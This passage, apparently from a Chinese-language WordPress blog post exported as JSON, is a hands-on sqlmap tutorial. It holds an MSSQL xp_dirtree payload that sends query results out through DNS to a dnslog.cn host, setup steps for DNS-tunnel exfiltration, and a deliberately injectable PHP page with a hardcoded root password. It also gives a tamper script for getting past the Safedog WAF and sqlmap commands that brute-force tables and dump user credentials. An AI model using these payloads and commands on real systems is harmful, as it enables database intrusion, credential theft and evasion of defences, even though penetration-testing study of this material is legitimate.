set@host=CONVERT(varchar(5000),@s)+'.2kbg3j.dnslog.cn';EXEC('master..xp_dirtree \"\\'+@host+'foobar$\"')<\/code><\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae39314e25.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746432792954-2583bccf-3930-4e00-bfed-ae5e6e3d1bec.png\" \/><\/p>\n<h2>sqlmap &#8211;dns-domain \u6ce8\u5165<\/h2>\n<p>\u5982\u679c\u76ee\u6807\u5b58\u5728\u6ce8\u5165\uff0c\u4f7f\u7528\u65f6\u95f4\u6ce8\u5165\u7684\u65f6\uff0c\u901f\u5ea6\u8fc7\u6162\uff0c\u53ef\u4ee5\u4f7f\u7528dnslog\u6ce8\u5165<\/p>\n<p>\u9996\u5148\u51c6\u5907\u4e24\u4e2a\u57df\u540d readteam.club 1377day.com<\/p>\n<p>readteam.club \u8fd9\u4e2a\u662f\u963f\u91cc\u4e91\u7684\u57df\u540d \u6dfb\u52a0\u4e09\u6761\u8bb0\u5f55 
\u5206\u522b\u662f* \u3001ns1\u3001 ns2<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae395b2022.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746432817432-9694c6d5-4871-460c-8e0d-dd1e23bbfd06.png\" \/><\/p>\n<p>1377day.com \u8bbe\u7f6e dns\u670d\u52a1\u670d\u52a1\u4e3a ns1.readteam.club ns2.readteam.club<img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae3986e332.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746432825501-8315fed8-4df1-4cbf-8640-813716a38ab4.png\" \/><\/p>\n<p>\u5728sqlmap\u670d\u52a1\u5668\u4e0a\u76d1\u542c53\u7aef\u53e3<\/p>\n<p>tcpdump -n port 53<\/p>\n<p>ping www.1377day.com<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae39b557d0.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746432834917-66a84310-dcd9-42a4-9a14-acd7c12e7b93.png\" \/>\u8fd9\u4e2a\u662f\u5b58\u5728\u76f2\u6ce8\u5165\u7684php\u4ee3\u7801<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-html\">&lt;?php\n$servername = \"localhost\";\n$username = \"root\";\n$password = \"oCFWyfGnz8gcWuWv\";\n$dbame=\"x_pt7_site\";\n\/\/ Create connection\n$conn = new mysqli($servername, $username, $password);\n\/\/ Check connection\nif ($conn-&gt;connect_error) {\ndie(\"Connection failed: \" . 
$conn-&gt;connect_error);\n}\n$conn-&gt;select_db(\"x_pt7_site\") or die(\"\u9009\u62e9\u6570\u636e\u5e93\u5931\u8d25\uff1a\".$conn-&gt;error);\n$id = $_GET['id'];\n$sql = \"select * from users where id=\".$id; \/\/ \u6570\u5b57\u578b\n$res =$conn-&gt;query($sql);\necho \"&lt;br&gt;&lt;br&gt;\";\necho \"&lt;br&gt;\";\n\/*\nwhile($rows = $res-&gt;fetch_array()){\necho $rows['username'];\n}\n*\/\necho \"&lt;b&gt;\";\n?&gt;<\/code><\/pre>\n<p>\u8fd9\u4e2a\u547d\u4ee4\u5728sqlmap\u670d\u52a1\u5668\u4e0a\u6267\u884c<\/p>\n<p><code>python3 sqlmap.py -u http:\/\/s.pt7.site\/sql.php?id=1 --dbms mysql --technique=T --dns-domain=1377day.com -Dx_pt7_site --columns --batch<\/code><\/p>\n<p>\u53ef\u4ee5\u770b\u5230dns \u96a7\u9053\u901a\u4fe1\u6210\u529f\u3002\u76f2\u6ce8\u5165\u7684\u901f\u5ea6\u6bd4\u65f6\u95f4\u76f2\u6ce8\u5165\u5feb\u591a\u4e86\u3002<\/p>\n<h1>\u7f16\u5199tamper\u6a21\u5757\u7ed5\u8fc7waf\u62e6\u622a\u7ee7\u7eed\u6ce8\u5165<\/h1>\n<p>\u9996\u5148\u5224\u65ad waf\u7684\u5382\u5546 \u65b0\u7248\u7684sqlmap\u4f1a\u81ea\u52a8\u53bb\u6267\u884cwaf\u68c0\u6d4b<\/p>\n<p>sqlmap -u <a href=\"http:\/\/www.p2.com\/inj.aspx?id=1\">http:\/\/www.p2.com\/inj.aspx?id=1<\/a> -v 1 &#8211;random-agent<\/p>\n<p>\u5728SQL\u6ce8\u5165\u4e2d\uff0c\u7ecf\u5e38\u6027\u4f1a\u9047\u5230\u5404\u79cd\u5382\u5546\u7684waf,\u7ed5\u8fc7\u4e4b\u540e\u7ecf\u5e38\u624b\u5de5\u63d0\u4ea4\uff0c\u8fd9\u6837\u663e\u5f97\u7279\u522b\u9a6c\u4e0a\uff0c\u7279\u522b\u662f\u8981\u6ce8\u5165\u5f97\u5230\u6570\u636e\u7684\u65f6\uff0c\u624b\u5de5\u83b7\u53d6\u7684\u4fe1\u606f\u592a<\/p>\n<p>\u6162\uff0c\u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u7528\u7f16\u5199sqlmap\u7684tamper\u6a21\u5757\u8fdb\u884c\u6ce8\u5165\uff0c\u81ea\u52a8\u5316\u8fdb\u884c\u64cd\u4f5c\uff0c\u8fd9\u6837\u5c31\u65b9\u4fbf\u5f97\u591a\u4e86\u3002<\/p>\n<p>\u9996\u5148\u5206\u6790\u5f97\u7ed5\u8fc7\u5b89\u5168\u72d7\u7684 
payload<\/p>\n<p>&#8211;\/<em>%0a\u8fd9\u91cc\u662f\u4f60\u7684\u586b\u5199\u4f60\u7684\u6ce8\u5165\u8bed\u53e5&#8211;%20<\/em>\/<\/p>\n<p>\u6ce8\u5165\u7684\u8bed\u53e5\u5728\u91cc\u9762\u4f1a\u6b63\u5e38\u6267\u884c\u88ab\u6267\u884c\u7684\u3002<\/p>\n<p>\u63a5\u7740\u6765\u5206\u6790\u4e00\u4e0btamper<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">#!\/usr\/bin\/env python\n\"\"\"\nCopyright (c) 2006-2019 sqlmap developers (http:\/\/sqlmap.org\/)\nSee the file 'LICENSE' for copying permission\nAuthor:pureqh.top\n\"\"\"\nimport re\nimport os\nfrom lib.core.data import kb\nfrom lib.core.enums import PRIORITY\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import DBMS\n__priority__ = PRIORITY.LOW # \u4f18\u5148\u7ea7\u8bbe\u7f6e\ndef dependencies():\n    singleTimeWarnMessage(\"Bypass safedog by pureqh'%s' only %s\" % (os.path.basename(__file__).split(\".\")[0],\n                                                                    DBMS.MSSQL)) #\u63cf\u8ff0\n# tamper\u51fd\u6570\u4e3a\u81ea\u5b9a\u4e49\u4f60\u7684payload\ndef tamper(payload, **kwargs):\n    payload=payload.replace('AND','--\/*%0aAND')#\u5173\u952e\u8bcd\u66ff\u6362\npayload=payload.replace('ORDER','--\/*%0aORDER')\npayload=payload.replace('UNION','--\/*%0aunion')\npayload+='--%20*\/'#\u8ffd\u52a0\u5b57\u7b26\u4e32\nreturn payload #\u8fd4\u56de\u6700\u7ec8\u7684\u5b57\u7b26\u4e32<\/code><\/pre>\n<p>\u6267\u884c\u547d\u4ee4<\/p>\n<p>\u4f7f\u7528\u8054\u5408\u67e5\u8be2\u6ce8\u5165\u68c0\u6d4b\uff0c\u968f\u673a\u6d4f\u89c8\u5668 \u9ed8\u8ba4\u4f1a\u88ab\u5b89\u5168\u72d7\u62e6\u622a<\/p>\n<p>sqlmap.py -u <a href=\"http:\/\/www.p2.com\/inj.aspx?id=1\">http:\/\/www.p2.com\/inj.aspx?id=1<\/a> &#8211;dbms=&quot;MSSQL&quot; &#8211;tamper bypass_safedog_msql.py -v 4 &#8211;flush-session &#8211;batch &#8211;tech=U &#8211;random-agent &#8211;dbs<\/p>\n<h1>sqlmap \u66b4\u529b\u7a77\u4e3e\u8868\u5b57\u6bb5<\/h1>\n<p>\u5728access\u548cmysql4.0\u6570\u636e\u5e93 
\u6ca1\u6709\u5185\u7f6e\u5e93\uff0c\u9488\u5bf9\u8fd9\u7c7b\u6570\u636e\u5e93sqlmap\u4f7f\u7528\u5b57\u5178\u7a77\u4e3e\u7684\u65b9\u6cd5\u5bf9\u8868\u8fdb\u884c\u731c\u89e3\u3002<\/p>\n<p>sqlmap\u5185\u7f6e\u8868\u548c\u5b57\u6bb5\u7684\u5b57\u5178<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae39e4d475.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746434777352-0c005644-bfcb-4f21-8cc4-5a5790673b52.png\" \/><\/p>\n<p>sqlmap -u <a href=\"http:\/\/www.dm3.com\/Content.asp?id=9\">http:\/\/www.dm3.com\/Content.asp?id=9<\/a> &#8211;dbms access &#8211;threads=10 &#8211;tables<\/p>\n<p>\u5b58\u5728\u6ce8\u5165\u7cfb\u7edf\u4f1a\u8be2\u95ee\u4f60\u662f\u5426\u4f7f\u7528\u5b57\u6bb5\u8fdb\u884c\u731c\u89e3 \u9009\u62e91\u540e\u4f1a\u81ea\u52a8\u731c\u89e3<\/p>\n<p>\u5982\u679c\u731c\u89e3\u51fa\u6765 \u63a5\u7740\u731c\u89e3\u5b57\u6bb5<\/p>\n<p>sqlmap -u <a href=\"http:\/\/www.dm3.com\/Content.asp?id=9\">http:\/\/www.dm3.com\/Content.asp?id=9<\/a> &#8211;dbms access &#8211;threads=10 -T i_users &#8211;columns<\/p>\n<p>\u5982\u679c\u4f60\u77e5\u9053\u5b57\u6bb5\u548c\u8868\u540d\u53ef\u4ee5\u76f4\u63a5\u4e0d\u731c\u89e3 sqlmap\u81ea\u52a8\u8fdb\u884c\u6570\u636e\u83b7\u53d6<\/p>\n<p>sqlmap -u <a href=\"http:\/\/www.dm3.com\/Content.asp?id=9\">http:\/\/www.dm3.com\/Content.asp?id=9<\/a> &#8211;dbms access &#8211;threads=10 -T i_user -C &quot;u_id,u_user,u_pass&quot; &#8211;dump<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae3a1cf61d.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746434813712-a04428fb-65f0-45aa-8fea-23b61ed04e4d.png\" \/><\/p>\n<blockquote>\n<p>\u66f4\u65b0: 2025-05-05 16:48:01<br 
\/>\n\u539f\u6587: <a href=\"https:\/\/www.yuque.com\/yuhui.net\/network\/eql3mp504rodzg8d\">https:\/\/www.yuque.com\/yuhui.net\/network\/eql3mp504rodzg8d<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>SQLmap \u5b98\u7f51 https:\/\/sqlmap.org\/ sqlmap\u662f\u4e00\u4e2a\u5f00\u6e90\u7684\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\uff0c\u5b83\u53ef\u4ee5\u81ea\u52a8\u5316\u68c0\u6d4b\u548c\u5229\u7528SQL\u6ce8\u5165\u6f0f\u6d1e\u5e76\u63a5\u7ba1\u6570\u636e\u5e93\u670d\u52a1\u5668\u3002\u5b83\u6709\u4e00\u4e2a\u5f3a\u5927\u7684\u68c0\u6d4b\u5f15\u64ce\uff0c\u8bb8\u591a\u9002\u5408\u4e8e\u7ec8\u6781\u6e17\u900f\u6d4b\u8bd5\u7684\u826f\u597d\u7279\u6027\u548c\u4f17\u591a\u7684\u64cd\u4f5c\u9009\u9879\uff0c\u4ece\u6570\u636e\u5e93\u6307\u7eb9\u3001\u6570\u636e\u83b7\u53d6\u5230\u8bbf\u95ee\u5e95\u5c42\u6587\u4ef6\u7cfb\u7edf\u3001\u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4 kali \u81ea\u5e26 sqlmap \u66f4\u65b0sqlmap python sqlmap.py &#8211;update \u663e\u793a\u7ec8\u7aef\u5e2e\u52a9 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[121,119,2],"tags":[12,22,28,43,57],"class_list":["post-716","post","type-post","status-publish","format-standard","hentry","category-ceshigongju","category-shentouceshijichu-network_sec","category-network_sec","tag-12","tag-windows","tag-kali","tag-43","tag-python"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/716","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=716"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/716\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=716"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=716"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=716"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
